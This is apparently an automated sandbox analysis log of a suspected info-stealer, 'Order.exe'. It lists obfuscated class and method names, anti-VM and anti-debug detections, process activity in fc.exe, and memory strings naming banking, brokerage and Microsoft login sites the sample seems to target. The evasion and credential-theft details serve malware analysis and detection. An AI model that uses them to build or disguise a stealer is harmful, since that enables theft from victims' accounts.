                Source: 0.2.Order.exe.70a0000.3.raw.unpack, XTxC8FVy1NLH6R5H92.csHigh entropy of concatenated method names: 'erSfPFncTV', 'Gh6fpnbRsR', 'FjifDXkeyD', 'o3if9iXV1V', 'cD9fYLNhUy', 'Vc2f0bQU9N', 'P4sfmKepVc', 'Dr6fCp4TGk', 'X4Zfu85sAd', 'EXXf3YBUUr'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, g7UVknWmsuA9pOFpK5.csHigh entropy of concatenated method names: 'Dispose', 'jSFS1n78s7', 'U2yH4UDUl7', 'gL1KVCwT8l', 'gLoStDs3fL', 'JsrSzo7CHU', 'ProcessDialogKey', 'MMUHT0yPV8', 'gU0HSAT3cS', 'P2xHHCEcfA'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, NIA8NLSSkVYIuvjbdU5.csHigh entropy of concatenated method names: 'Ad8LtEMC5A', 'D2sLzFMfX5', 'fexGTRHZr9', 'qsUGSHDXai', 'fAUGHgeZxw', 'uyAGaBZTJi', 'UmhGiUGLCN', 'MtNGx2dOHH', 'j99GNqIKbn', 'kMXGW4YAeK'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, Hhy3r4Sihn5qn2D1yYj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YflvkJaK5J', 'ofRvLuWVUI', 'CCuvGjK977', 'fQdvv0PENM', 'Lpqv6Esg55', 'loQvowdp1X', 'CvTvcGQMjs'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, SBFl3szAN9BIAopKeP.csHigh entropy of concatenated method names: 'jmZL0JwiYB', 'mtnLCKLvpv', 'NQhLuyRpJS', 'lk2LXjfBMZ', 'L83L4VbcLp', 'PJNL5cKtZo', 'le5L8lhCdJ', 'qmxLcqpf6V', 'hG0LPDBG3X', 'XaVLpgT2au'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, LRToqTRMv79ZE70a2X.csHigh entropy of concatenated method names: 'YGEgZRICS4', 'rTWgAY2cRC', 'ASDgRspm3h', 'kWOgUi3cMk', 'E9Ug4Ce3A5', 'EZSgqhySJf', 'Gwog5ZFWli', 'A5hg8GEHrl', 'iQdgK3xXG4', 't8cgbvfLXv'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, gWrW1AMb5JSFn78s7W.csHigh entropy of concatenated method names: 'Ix1kgetJpC', 'eDakI6SLao', 'OdxkkWvPlk', 'f3HkGWXAhw', 'pjjk6qMRdr', 'cOdkcngYxG', 'Dispose', 'SqdlNxDFni', 'mqBlWWicMY', 'KC5l2tpOZF'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, QH2qCN3DXJ76e9ZhjZ.csHigh entropy of concatenated method names: 'kmTjYdKSxJ', 'SvvjmgBxRE', 'YLK2qMhpx3', 'pAU25htolF', 'w9J28l8RlI', 'jBJ2K7eGmw', 'ML42bHIqXj', 'Um22B0DLnX', 'SSc2VQf5Vo', 'drQ2ZidQ52'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, CcSwQRsFuLY5V9HHwb.csHigh entropy of concatenated method names: 'YJhI71DW7D', 'W5WIEwKqIi', 'ToString', 'AnhINhN9Ui', 'kXYIWCvNAS', 'ofrI2yDJ5O', 'ispIj9iPOx', 'rApIJoqq81', 'HiqIfASSQd', 'qswIOmIM1F'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, IFb9yXHQYsT6aGaYKe.csHigh entropy of concatenated method names: 'W8nDty2cT', 'bfl9Cmjnf', 'NCL0nZ6PK', 'NYMmGGlgW', 'J5Lu9I7iJ', 'T2K3oC9BL', 'vCY8WQFPD0yBysfKnY', 'ohJejHWNy0pVJnbH3P', 'lk1lD2oI2', 'lshLqSR8c'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, ct5GO8Sa4yp6boot2fh.csHigh entropy of concatenated method names: 'TsPGt2iQSE', 'N9YGzmksKQ', 'YAyvTAOymK', 'WnFpiJxUP25juncTaOG', 'VgANlsxziJyht4pm3YP', 'X35FM7J768gchgT6l2B', 'LeqNdYJ86RvXrp3A8V8'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, WOvEGlbFUFuoitoiSB.csHigh entropy of concatenated method names: 'yw7fNaC4Oi', 'hXpf2xD1VT', 'J3ifJselXZ', 'ojpJtGRMWn', 'B0UJzHXQle', 'cKtfTivkUA', 'veNfSYMSUq', 'GePfHtWQPi', 'jHxfangAlJ', 'YWrfijYrEx'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, DmlG0vuofs9SjDZNsk.csHigh entropy of concatenated method names: 'RCD29Zca1R', 'ure20ri5rF', 'Ta92CIC9u6', 'ndE2u33sQ9', 'Vom2g4thvg', 'm8L2dQ5cvE', 'CK42IEgx17', 'fEm2lb5p2d', 'kd22ksKATv', 'AnP2LTG1SD'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, vLkQu0h9flEgOBwxpG.csHigh entropy of concatenated method names: 'Ee4nCqJVBX', 'jLWnur53f5', 'uaCnX9X61t', 'j4nn4nNKA4', 'cuan5DH1b3', 'V8Dn8dWajt', 'AlAnbaUSbj', 'qkMnB5l5eu', 'd5HnZ1C9yA', 'LAonwuWi7Q'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, DEcfA0tReK6vAshi84.csHigh entropy of concatenated method names: 'sqcL2PcEO8', 'YMqLjME8JH', 'SkKLJI7WGr', 'py0Lf0TtA9', 'ykhLk5MgUj', 'lSFLOTeU37', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, prCQ0nSTHWVoHsFE2hl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UyQLwxLNK5', 'hDsLAu8LCL', 'XE5LhEZhAq', 'UVpLRWSyTN', 'KWELUSkWPW', 'I1aLQU5Uyj', 'LLtLssELWt'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, GrbfCDO2Fb3aiPmKSc.csHigh entropy of concatenated method names: 'm1iaxRBYWS', 'OayaNyUpO3', 'xbeaWHWEGI', 'il9a2iYPVL', 'mUGajydVva', 'MslaJpwdL2', 'sccaf5T6FB', 'kIGaOXC0FH', 'ECIaeTDapI', 'nvSa7cBhxK'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, vr5o4TCnKABqtW5kUU.csHigh entropy of concatenated method names: 'iRoWR5D8Bn', 'hqTWU5wVQa', 'T3dWQ7xEIs', 'smfWs0n5My', 'nV3WrMICoH', 'rsTWFaMRX2', 'FkgWMRLxu9', 'qpaWy0R0pX', 'QA6W1N52ia', 'wIGWtRghsD'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, wDVu3IFeNnoDIiIgEw.csHigh entropy of concatenated method names: 'Dg9IyofeUe', 'ejQIt0NDIy', 'OfylTk9g2o', 'SwRlSEK2xh', 'BdsIwGUqn7', 'PgYIApAKTA', 'hn2Ih4OV07', 'QCSIRAMtkD', 'fglIUnL4fc', 'MERIQiVI5y'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, MDbR9JXFa83jJGxJTI.csHigh entropy of concatenated method names: 'A0bJxDAcZq', 'dnVJWj2p04', 'S7YJjGvqOW', 'FQEJfuDX1n', 'QIcJOLkf6Y', 'lFUjr3k247', 'lZTjFg4nGc', 'y01jMn3D8Y', 'uGkjyt1gTY', 'TtBj13ACgy'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, S0yPV81WU0AT3cSA2x.csHigh entropy of concatenated method names: 'WqikX0cC0I', 'YVuk4BrYwd', 'qRnkqWxdUh', 'axUk52FyKW', 'RBCk8RIbHb', 'W6dkKNDpDT', 'NVKkbw29hi', 'Y4EkB9TQ8W', 'VKxkV5sksD', 'rMqkZYp0MV'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, CH8dJ1irwJ3NvXoVkm.csHigh entropy of concatenated method names: 'Rx6Sfr5o4T', 'oKASOBqtW5', 'uofS7s9SjD', 'ONsSEkhH2q', 'AZhSgjZVDb', 'R9JSdFa83j', 'TEl50K01TCkpnhwSZf', 'mJ530PDGxVoYr9YL5I', 'tipSSrCVY0', 'QmjSawHE0E'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, QIkfoDQ92Aa3eL9Mpc.csHigh entropy of concatenated method names: 'ToString', 'PL8dwp8q86', 'R3pd4pE1Ok', 'Jq9dqmOm1A', 'J8Nd5k4MLp', 'Lp2d8U2xxE', 'XKmdK2Yaw9', 'qLkdbJtB1m', 'FyZdBD7yxC', 'qOVdVsijBJ'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, XTxC8FVy1NLH6R5H92.csHigh entropy of concatenated method names: 'erSfPFncTV', 'Gh6fpnbRsR', 'FjifDXkeyD', 'o3if9iXV1V', 'cD9fYLNhUy', 'Vc2f0bQU9N', 'P4sfmKepVc', 'Dr6fCp4TGk', 'X4Zfu85sAd', 'EXXf3YBUUr'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, g7UVknWmsuA9pOFpK5.csHigh entropy of concatenated method names: 'Dispose', 'jSFS1n78s7', 'U2yH4UDUl7', 'gL1KVCwT8l', 'gLoStDs3fL', 'JsrSzo7CHU', 'ProcessDialogKey', 'MMUHT0yPV8', 'gU0HSAT3cS', 'P2xHHCEcfA'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, NIA8NLSSkVYIuvjbdU5.csHigh entropy of concatenated method names: 'Ad8LtEMC5A', 'D2sLzFMfX5', 'fexGTRHZr9', 'qsUGSHDXai', 'fAUGHgeZxw', 'uyAGaBZTJi', 'UmhGiUGLCN', 'MtNGx2dOHH', 'j99GNqIKbn', 'kMXGW4YAeK'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, Hhy3r4Sihn5qn2D1yYj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YflvkJaK5J', 'ofRvLuWVUI', 'CCuvGjK977', 'fQdvv0PENM', 'Lpqv6Esg55', 'loQvowdp1X', 'CvTvcGQMjs'
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, SBFl3szAN9BIAopKeP.csHigh entropy of concatenated method names: 'jmZL0JwiYB', 'mtnLCKLvpv', 'NQhLuyRpJS', 'lk2LXjfBMZ', 'L83L4VbcLp', 'PJNL5cKtZo', 'le5L8lhCdJ', 'qmxLcqpf6V', 'hG0LPDBG3X', 'XaVLpgT2au'
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Order.exe PID: 4540, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\Order.exeMemory allocated: E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Order.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Order.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Order.exeMemory allocated: 7230000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Order.exeMemory allocated: 8230000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Order.exeMemory allocated: 83D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Order.exeMemory allocated: 93D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A0096E rdtsc 9_2_01A0096E
                Source: C:\Users\user\Desktop\Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 9721Jump to behavior
                Source: C:\Users\user\Desktop\Order.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\Order.exe TID: 6880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe TID: 4116Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\fc.exe TID: 2908Thread sleep count: 253 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exe TID: 2908Thread sleep time: -506000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\fc.exe TID: 2908Thread sleep count: 9721 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exe TID: 2908Thread sleep time: -19442000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0321C500 FindFirstFileW,FindNextFileW,FindClose,12_2_0321C500
                Source: C:\Users\user\Desktop\Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 0349A-n.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 0349A-n.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 0349A-n.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 0349A-n.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 0349A-n.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 0349A-n.12.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 0349A-n.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 0349A-n.12.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 0349A-n.12.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 0349A-n.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3124458453.00000000005F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                Source: 0349A-n.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 0349A-n.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 0349A-n.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 0349A-n.12.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 0349A-n.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 0349A-n.12.drBinary or memory string: discord.comVMware20,11696492231f
                Source: firefox.exe, 00000010.00000002.2135034194.0000018F3B06C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
                Source: 0349A-n.12.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 0349A-n.12.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 0349A-n.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 0349A-n.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 0349A-n.12.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 0349A-n.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 0349A-n.12.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 0349A-n.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 0349A-n.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                Source: 0349A-n.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 0349A-n.12.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 0349A-n.12.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 0349A-n.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 0349A-n.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 0349A-n.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\Order.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A0096E rdtsc 9_2_01A0096E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_00417793 LdrLoadDll,9_2_00417793
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA197 mov eax, dword ptr fs:[00000030h]9_2_019BA197
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA197 mov eax, dword ptr fs:[00000030h]9_2_019BA197
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA197 mov eax, dword ptr fs:[00000030h]9_2_019BA197
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A00185 mov eax, dword ptr fs:[00000030h]9_2_01A00185
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A64180 mov eax, dword ptr fs:[00000030h]9_2_01A64180
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A64180 mov eax, dword ptr fs:[00000030h]9_2_01A64180
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7C188 mov eax, dword ptr fs:[00000030h]9_2_01A7C188
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7C188 mov eax, dword ptr fs:[00000030h]9_2_01A7C188
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4019F mov eax, dword ptr fs:[00000030h]9_2_01A4019F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4019F mov eax, dword ptr fs:[00000030h]9_2_01A4019F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4019F mov eax, dword ptr fs:[00000030h]9_2_01A4019F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4019F mov eax, dword ptr fs:[00000030h]9_2_01A4019F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A961E5 mov eax, dword ptr fs:[00000030h]9_2_01A961E5
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F01F8 mov eax, dword ptr fs:[00000030h]9_2_019F01F8
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A861C3 mov eax, dword ptr fs:[00000030h]9_2_01A861C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A861C3 mov eax, dword ptr fs:[00000030h]9_2_01A861C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]9_2_01A3E1D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]9_2_01A3E1D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E1D0 mov ecx, dword ptr fs:[00000030h]9_2_01A3E1D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]9_2_01A3E1D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]9_2_01A3E1D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov ecx, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov ecx, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov ecx, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov ecx, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F0124 mov eax, dword ptr fs:[00000030h]9_2_019F0124
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A80115 mov eax, dword ptr fs:[00000030h]9_2_01A80115
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6A118 mov ecx, dword ptr fs:[00000030h]9_2_01A6A118
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6A118 mov eax, dword ptr fs:[00000030h]9_2_01A6A118
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6A118 mov eax, dword ptr fs:[00000030h]9_2_01A6A118
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6A118 mov eax, dword ptr fs:[00000030h]9_2_01A6A118
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C6154 mov eax, dword ptr fs:[00000030h]9_2_019C6154
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C6154 mov eax, dword ptr fs:[00000030h]9_2_019C6154
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BC156 mov eax, dword ptr fs:[00000030h]9_2_019BC156
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94164 mov eax, dword ptr fs:[00000030h]9_2_01A94164
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94164 mov eax, dword ptr fs:[00000030h]9_2_01A94164
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A54144 mov eax, dword ptr fs:[00000030h]9_2_01A54144
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A54144 mov eax, dword ptr fs:[00000030h]9_2_01A54144
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A54144 mov ecx, dword ptr fs:[00000030h]9_2_01A54144
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A54144 mov eax, dword ptr fs:[00000030h]9_2_01A54144
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A54144 mov eax, dword ptr fs:[00000030h]9_2_01A54144
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A58158 mov eax, dword ptr fs:[00000030h]9_2_01A58158
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A580A8 mov eax, dword ptr fs:[00000030h]9_2_01A580A8
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A860B8 mov eax, dword ptr fs:[00000030h]9_2_01A860B8
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A860B8 mov ecx, dword ptr fs:[00000030h]9_2_01A860B8
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C208A mov eax, dword ptr fs:[00000030h]9_2_019C208A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B80A0 mov eax, dword ptr fs:[00000030h]9_2_019B80A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A460E0 mov eax, dword ptr fs:[00000030h]9_2_01A460E0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A020F0 mov ecx, dword ptr fs:[00000030h]9_2_01A020F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BC0F0 mov eax, dword ptr fs:[00000030h]9_2_019BC0F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C80E9 mov eax, dword ptr fs:[00000030h]9_2_019C80E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA0E3 mov ecx, dword ptr fs:[00000030h]9_2_019BA0E3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A420DE mov eax, dword ptr fs:[00000030h]9_2_01A420DE
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE016 mov eax, dword ptr fs:[00000030h]9_2_019DE016
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE016 mov eax, dword ptr fs:[00000030h]9_2_019DE016
